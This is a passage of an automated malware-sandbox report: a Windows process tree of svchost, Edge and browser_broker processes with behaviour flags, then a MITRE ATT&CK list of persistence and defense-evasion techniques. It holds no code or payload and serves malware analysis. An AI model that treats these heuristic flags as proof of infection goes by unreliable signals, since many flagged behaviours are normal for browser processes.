\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5204
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8612
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2416
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9132
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5004
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8004
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7468
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6404
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5876
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4644
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6260
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5888
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8552
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6780
Network
MITRE ATT&CK Enterprise v6
Persistence
- Modify Existing Service: 1
- Registry Run Keys / Startup Folder: 1
- Scheduled Task: 1
Defense Evasion
- Disabling Security Tools: 1
- Install Root Certificate: 1
- Modify Registry: 4
- Virtualization/Sandbox Evasion: 1
- Web Service: 1